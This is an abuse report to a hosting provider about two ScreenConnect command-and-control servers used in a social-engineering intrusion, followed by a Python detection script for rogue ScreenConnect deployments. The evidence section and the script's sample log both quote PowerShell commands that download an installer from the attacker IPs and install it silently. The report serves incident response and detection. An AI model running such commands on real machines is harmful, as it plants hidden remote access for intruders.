Subject: Abuse Report - Unauthorized Remote Access C2 Servers on 80.76.49.18 and 45.88.91.99
To: abuses@virtuo.host
CC: noc@virtuo.host

Dear Virtuo Abuse Department,

We are reporting two IP addresses on your network that are being used as command-and-control servers for unauthorized remote access attacks against our client's infrastructure.

## Offending IPs

- **80.76.49.18** (port 8041)
- **45.88.91.99** (port 8041)

Both IPs are on AS399486 (12651980 CANADA INC. / Virtuo).

## Nature of Abuse

These servers are hosting self-hosted ConnectWise ScreenConnect (remote access) instances on ports 8040/8041, used to maintain persistent unauthorized access to victim machines. This is not a legitimate use of remote support software -- the clients are deployed silently via PowerShell commands executed during an active social engineering attack, then hidden from the Windows uninstall list using third-party tools.

## Evidence

### Attack Timeline (March 27, 2026 - UTC-7)

1. At approximately 08:28, an attacker using the alias "Angel Raya" connected to the victim machine via a ScreenConnect cloud relay (instance-wlb9ga-relay.screenconnect.com).
2. At 08:29, the following commands were executed in a PowerShell session on the victim machine to download and silently install ScreenConnect clients from your infrastructure:

   ```
   powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
   powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
   ```

3. The attacker then downloaded a tool from sordum.org ("Hide From Uninstall List") to conceal the rogue ScreenConnect installations from Windows Add/Remove Programs.
4. At 11:55, a session identified as "Administrator" connected back through the 80.76.49.18 C2 server, confirming the backdoor was actively used for return access.

### ScreenConnect Service Details

**Client connecting to 80.76.49.18:**

- Service Name: ScreenConnect Client (0dfe1abae029411c)
- Session GUID: eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56
- Relay: 80.76.49.18:8041
- Version: 25.2.4.9229

**Client connecting to 45.88.91.99:**

- Service Name: ScreenConnect Client (a897d9a21259d116)
- Session GUID: 406bd356-cde4-4738-a22f-f776c8097686
- Relay: 45.88.91.99:8041
- Version: 25.2.4.9229

### Additional Context

- The ScreenConnect MSI packages have file timestamps from April 8, 2025, indicating this infrastructure has been in use for attacks for approximately one year.
- The victim's Microsoft 365 account was also subject to brute-force login attempts from IPs in Germany (45.86.202.x), Luxembourg, and Turkey during the same period, with a successful unauthorized sign-in from Istanbul, Turkey (91.93.232.236) on the same day.

## Requested Action

We request that you:

1. Immediately suspend the servers at 80.76.49.18 and 45.88.91.99
2. Preserve all logs related to these IPs for law enforcement
3. Provide any subscriber/billing information to law enforcement upon request

This incident is being reported to the FBI Internet Crime Complaint Center (IC3) and ConnectWise.

## Reporting Organization

Arizona Computer Guru, LLC
Managed Service Provider
Phone: 520-304-8300
Email: support@azcomputerguru.com

Thank you for your prompt attention to this matter.
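As an added, defender-side example (not part of the abuse report, and not code from Arizona Computer Guru or ConnectWise): a Python script that screens Windows process-creation command lines (Sysmon Event ID 1 or Security 4688 style) for the deployment pattern described in the Evidence section, namely `Invoke-WebRequest` fetching `ScreenConnect.ClientSetup.msi` from a host outside the organisation's approved ScreenConnect instance, followed by a quiet `msiexec` install, and that inventories `ScreenConnect Client (<id>)` services against an approved-id set. The `APPROVED_HOSTS` entry, the approved service id `1111111111111111`, and the benign and unrelated log lines are constructed assumptions; the two attacker command lines and the two service names are the ones quoted in the report.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Hosts the organisation legitimately deploys ScreenConnect from (constructed allowlist).
APPROVED_HOSTS = {"support.example-msp.invalid"}

# URL of a ScreenConnect client installer embedded in a command line.
MSI_URL_RE = re.compile(
    r"https?://[^\s'\"]*?/Bin/ScreenConnect\.ClientSetup\.msi[^\s'\"]*", re.IGNORECASE
)
# msiexec installing that package with a quiet switch in the same command line.
SILENT_INSTALL_RE = re.compile(
    r"msiexec.*ScreenConnect\.ClientSetup\.msi.*(/qn|/quiet|/q\b)", re.IGNORECASE | re.DOTALL
)
# Service name format seen in the report: "ScreenConnect Client (<16 hex digits>)".
CLIENT_SERVICE_RE = re.compile(r"^ScreenConnect Client \(([0-9a-f]{16})\)$", re.IGNORECASE)


@dataclass
class Finding:
    host: str            # where the installer was fetched from
    port: int            # web/download port of that instance
    params: dict         # query parameters carried by the installer URL
    reasons: list = field(default_factory=list)


def analyze_command_line(cmd: str) -> Optional[Finding]:
    """Return a Finding when the command line fetches a ScreenConnect client
    installer from a host that is not on the allowlist, else None."""
    m = MSI_URL_RE.search(cmd)
    if not m:
        return None
    url = urlparse(m.group(0))
    host = (url.hostname or "").lower()
    if host in APPROVED_HOSTS:
        return None
    port = url.port or (443 if url.scheme == "https" else 80)
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    reasons = ["download host not in the approved ScreenConnect allowlist"]
    try:
        ipaddress.ip_address(host)
        reasons.append("download host is a bare IP address rather than a hostname")
    except ValueError:
        pass
    if SILENT_INSTALL_RE.search(cmd):
        reasons.append("silent msiexec install (/qn) in the same command")
    if url.scheme == "http":
        reasons.append("installer fetched over cleartext HTTP")
    return Finding(host, port, params, reasons)


def scan_process_log(lines):
    """Scan process-creation log lines (one command line per entry) and return findings."""
    return [f for f in map(analyze_command_line, lines) if f is not None]


def rogue_client_services(service_names, approved_ids=frozenset()):
    """From Windows service names, return ScreenConnect client services whose
    instance id is not in the approved set."""
    rogue = []
    for name in service_names:
        m = CLIENT_SERVICE_RE.match(name)
        if m and m.group(1).lower() not in approved_ids:
            rogue.append(name)
    return rogue


# Constructed sample telemetry. The first two lines are the command lines quoted in the report.
SAMPLE_PROCESS_LOG = [
    "powershell -Command \"Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait\"",
    "powershell -Command \"Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait\"",
    # Constructed benign line: the MSP's own approved instance.
    "powershell -Command \"Invoke-WebRequest -Uri 'https://support.example-msp.invalid/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'sc.msi'\"",
    # Constructed unrelated line.
    "C:\\Windows\\System32\\svchost.exe -k netsvcs -p",
]

# Constructed service inventory; the first two names are those listed in the report.
SAMPLE_SERVICES = [
    "ScreenConnect Client (0dfe1abae029411c)",
    "ScreenConnect Client (a897d9a21259d116)",
    "ScreenConnect Client (1111111111111111)",  # constructed: the MSP's own approved instance
    "Spooler",
]

if __name__ == "__main__":
    for f in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"{f.host}:{f.port} {f.params} -> {'; '.join(f.reasons)}")
    print(rogue_client_services(SAMPLE_SERVICES, {"1111111111111111"}))
```

In practice the command lines would come from an EDR or SIEM export and the service list from `Get-Service` on the host under review; the allowlist is the control that distinguishes a sanctioned remote-support deployment from one like the reported incident, which is why an approved host short-circuits the check before any other heuristic is applied.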